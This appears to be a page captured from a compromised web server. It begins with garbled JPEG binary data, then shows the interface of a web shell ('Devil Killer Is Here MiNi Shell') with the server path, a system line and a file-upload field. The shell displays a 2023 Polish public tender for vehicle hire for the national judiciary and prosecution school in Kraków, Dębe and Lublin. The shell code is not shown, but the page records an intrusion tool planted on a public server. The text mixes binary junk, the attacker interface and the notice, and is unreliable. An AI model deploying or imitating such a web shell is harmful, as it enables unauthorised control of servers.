JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230824/0036692001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Kraków, Dębe, Lublin) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowa Szkoła Sądownictwa i Prokuratury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140580428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przy Rondzie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-547</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 617 96 15</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kssip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.kssip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Kraków, Dębe, Lublin) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc78eef5-40be-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00366920</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00274151/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Kraków, Dębe, Lublin)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=d02d3ad5-085f-43bf-b39c-b8dd2427afd5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Szczegółowe informacje zawiera Rozdział 8 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dla Wykonawcy znajduje się w Rozdziale 19 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA-X.2611.24.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 336195,36 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Kraków).<br/>Opis przedmiotu zamówienia jest szczegółowo określony w załączniku nr 2 do SWZ (dla części 1).<br/>Sposób realizacji przedmiotu zamówienia, jest szczegółowo określony w projektowanych postanowieniach umowy (we wzorze umowy), które stanowią załącznik nr 3 do SWZ (dla części 1). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 66760,19 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60170000-0 - Wynajem pojazdów przeznaczonych do transportu osób wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>2.	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1)	A: Cena brutto zamówienia – 60 pkt<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 60 pkt, pozostali odpowiednio mniej wg wzoru:<br/>[najniższa cena brutto] : [ cena brutto oferty ocenianej] x 60 pkt = liczba punktów oferty ocenianej.<br/>2)	B: Wiek taboru – 40 pkt<br/>Ocenie podlega wiek taboru, czyli rok produkcji poszczególnych zaoferowanych pojazdów, którymi będzie świadczona usługa – im młodsze tym większa premia punktowa zostanie przyznana.<br/>Punkty zostaną przyznane wg wzoru:<br/>W = (W1 + W2 + W3 + W4)<br/>Gdzie poszczególne pojazdy zostały oznaczone w następujący sposób:<br/>Lp. Wskazanie rodzaju pojazdu<br/>W1 Autokar umożliwiający jednorazowy przewóz 60 pasażerów <br/>W2 Autokar umożliwiający jednorazowy przewóz 50 pasażerów <br/>W3 Autokar/bus umożliwiający jednorazowy przewóz 20 pasażerów<br/>W4 Autokar/bus umożliwiający jednorazowy przewóz 10 pasażerów <br/>Punkty za rok produkcji pojazdu przeznaczonego do realizacji zamówienia:<br/>Rocznik 2017 i starszy: 0 pkt<br/>Rocznik 2018: 2 pkt<br/>Rocznik 2019: 4 pkt<br/>Rocznik 2020: 6 pkt<br/>Rocznik 2021: 8 pkt<br/>Rocznik 2022 i nowszy: 10 pkt.<br/>Oferowany wiek taboru może się mieścić wyłącznie w przedziale od 2013 r. do 2022r. i nowszy tj. rok produkcji poszczególnych pojazdów przeznaczonych do realizacji zamówienia nie może być starszy niż 2013 rok - w przypadku zaoferowania pojazdu wyprodukowanego w 2012 roku i wcześniej zamawiający odrzuci ofertę.<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w formularzu oferty – „Wykaz taboru”<br/><br/>W przypadku nie wypełnienia w formularzu oferty „ Wykaz taboru” odpowiedniej rubryki wskazującej na rok produkcji poszczególnych pojazdów Zamawiający uzna, że rokiem produkcji jest rok 2013 (jest to najstarszy dopuszczony rocznik pojazdu w OPZ) i nie przyzna punktów w tych pozycjach.<br/><br/>Za ofertę najkorzystniejszą zostanie uznana ta oferta, spośród ofert spełniających warunki określone w SWZ, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska największą liczbę punktów (P). <br/>Suma punktów w kryterium „A”, „B” wyliczana będzie według wzoru: <br/>P= A+B<br/>Gdzie:<br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”,<br/>B - liczba punktów przyznanych badanej ofercie w kryterium „Wiek taboru”.<br/><br/>3.	Maksymalnie oferta może uzyskać 100 pkt.<br/>4.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>5.	Do oceny ofert będą brane pod uwagę ceny oferty brutto.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek taboru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Dębe).<br/>Opis przedmiotu zamówienia jest szczegółowo określony w załączniku nr 2 do SWZ (dla części 2).<br/>Sposób realizacji przedmiotu zamówienia, jest szczegółowo określony w projektowanych postanowieniach umowy (we wzorze umowy), które stanowią załącznik nr 3 do SWZ (dla części 2). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 242212,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60170000-0 - Wynajem pojazdów przeznaczonych do transportu osób wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>2.	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1)	A: Cena brutto zamówienia – 60 pkt<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 60 pkt, pozostali odpowiednio mniej wg wzoru:<br/>[najniższa cena brutto] : [ cena brutto oferty ocenianej] x 60 pkt = liczba punktów oferty ocenianej.<br/>2)	B: Wiek taboru – 40 pkt<br/>Ocenie podlega wiek taboru czyli rok produkcji poszczególnych zaoferowanych pojazdów (W1 do W7), którymi będzie świadczona usługa – im młodsze tym większa premia punktowa zostanie przyznana.<br/>Punkty za kryterium wiek taboru (W) zostaną przyznane wg wzoru:<br/>W = [Suma przyznanych punktów za rok produkcji pojazdu przeznaczonego do realizacji zamówienia z badanej oferty] : [ 70,00 tj. max ilość punktów jaką można uzyskać w kryterium wiek taboru ] x 40 pkt<br/>gdzie poszczególne pojazdy zostały oznaczone w następujący sposób:<br/>W1: klimatyzowany, ogrzewany autokar umożliwiający jednorazowy przewóz 50 osób <br/>( w tym kierowca) -1 szt.;<br/>W2: klimatyzowany, ogrzewany autokar umożliwiający jednorazowy przewóz 30 osób <br/>(w tym kierowca)- 2 szt.;<br/>W3: klimatyzowany, ogrzewany bus umożliwiający jednorazowy przewóz 20 osób<br/> (w tym kierowca)- 1 szt.;<br/>W4: klimatyzowany, ogrzewany bus umożliwiający jednorazowy przewóz 16<br/> (w tym kierowca)-1 szt.;<br/>W5: klimatyzowany, ogrzewany mikrobus umożliwiający jednorazowy przewóz <br/>9 osób (w tym kierowca)- 1 szt.;<br/>W6: klimatyzowany, ogrzewany samochód osobowy umożliwiający jednorazowy przewóz 3 osób + kierowca -1 szt.;<br/>W7: klimatyzowany, ogrzewany samochód umożliwiający jednorazowy przewóz 1 osoby niepełnosprawnej + 1 opiekuna + kierowca-1 szt.<br/><br/>W2 zostanie wyliczony wg wzoru [maksymalnie 10 pkt]:<br/>W2 = [suma wskazanych w ofercie roczników produkcji autokarów umożliwiających jednorazowy przewóz 30 osób (w tym kierowca) ] : 2 <br/>W2 zostanie zaokrąglone do pełnego rocznika. Wszelkie obliczenia Zamawiający dokona z dokładnością do pełnego rocznika przy czym końcówki poniżej 0,50 pominie, a końcówki 0,50 i wyższe zaokrągli wzwyż do pełnego rocznika.<br/>W1, W3-W7 punkty zostaną przyznane według punktacji jak niżej za rok produkcji pojazdu przeznaczonego do realizacji zamówienia<br/>Punkty za rok produkcji pojazdu przeznaczonego do realizacji zamówienia:<br/>Rocznik 2017 i starszy: 0 pkt,<br/>Rocznik 2018: 2 pkt,<br/>Rocznik 2019: 4 pkt,<br/>Rocznik 2020: 6 pkt,<br/>Rocznik 2021: 8 pkt,<br/>Rocznik 2022 i nowszy: 10 pkt<br/>Oferowany wiek taboru może się mieścić wyłącznie w przedziale od 2013 r. do 2022r. i nowszy tj. rok produkcji poszczególnych pojazdów przeznaczonych do realizacji zamówienia nie może być starszy niż 2013 rok. W przypadku zaoferowania pojazdu wyprodukowanego w 2012 roku i wcześniej Zamawiający odrzuci ofertę.<br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w formularzu oferty – „Wiek taboru”.<br/>W przypadku nie wypełnienia w formularzu oferty odpowiedniej rubryki wskazującej na rok produkcji poszczególnych pojazdów ( pkt. pozacenowe kryterium oceny ofert: <br/>„ Wiek taboru”) Zamawiający uzna, że rokiem produkcji jest rok 2013 (jest to najstarszy dopuszczony rocznik pojazdu w OPZ) i nie przyzna punktów w tych pozycjach.<br/>Za ofertę najkorzystniejszą zostanie uznana ta oferta, spośród ofert spełniających warunki określone w SWZ, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska największą liczbę punktów (P). <br/>Suma punktów w kryterium „A”, „B” wyliczana będzie według wzoru: <br/>P= A+B<br/>Gdzie:<br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”,<br/>B - liczba punktów przyznanych badanej ofercie w kryterium „Wiek taboru”.<br/>3.	Maksymalnie oferta może uzyskać 100 pkt.<br/>4.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>5.	Do oceny ofert będą brane pod uwagę ceny oferty brutto.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek taboru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportowa obejmująca wynajem pojazdów na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury (Dębe).<br/>Opis przedmiotu zamówienia jest szczegółowo określony w załączniku nr 2 do SWZ <br/>(dla części 3).<br/>Sposób realizacji przedmiotu zamówienia, jest szczegółowo określony w projektowanych postanowieniach umowy (we wzorze umowy), które stanowią załącznik nr 3 do SWZ (dla części 3). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 27222,21 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60170000-0 - Wynajem pojazdów przeznaczonych do transportu osób wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>2.	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1)	A: Cena brutto zamówienia – 60 pkt<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 60 pkt, pozostali odpowiednio mniej wg wzoru:<br/>[najniższa cena brutto] : [ cena brutto oferty ocenianej] x 60 pkt = liczba punktów oferty ocenianej.<br/>2)	B: Wiek taboru – 40 pkt<br/>Ocenie podlega wiek taboru, czyli rok produkcji poszczególnych zaoferowanych pojazdów, którymi będzie świadczona usługa – im młodsze tym większa premia punktowa zostanie przyznana.<br/>Punkty zostaną przyznane wg wzoru:<br/>W = (W1 + W2 + W3 + W4)<br/>Gdzie poszczególne pojazdy zostały oznaczone w następujący sposób:<br/>Lp. Wskazanie rodzaju pojazdu<br/>W1 Autokar umożliwiający jednorazowy przewóz 60 pasażerów <br/>W2 Autokar umożliwiający jednorazowy przewóz 50 pasażerów <br/>W3 Autokar/bus umożliwiający jednorazowy przewóz 20 pasażerów<br/>W4 Autokar/bus umożliwiający jednorazowy przewóz 10 pasażerów <br/>Punkty za rok produkcji pojazdu przeznaczonego do realizacji zamówienia:<br/>Rocznik 2017 i starszy: 0 pkt<br/>Rocznik 2018: 2 pkt<br/>Rocznik 2019: 4 pkt<br/>Rocznik 2020: 6 pkt<br/>Rocznik 2021: 8 pkt<br/>Rocznik 2022 i nowszy: 10 pkt.<br/>Oferowany wiek taboru może się mieścić wyłącznie w przedziale od 2013 r. do 2022r. i nowszy tj. rok produkcji poszczególnych pojazdów przeznaczonych do realizacji zamówienia nie może być starszy niż 2013 rok - w przypadku zaoferowania pojazdu 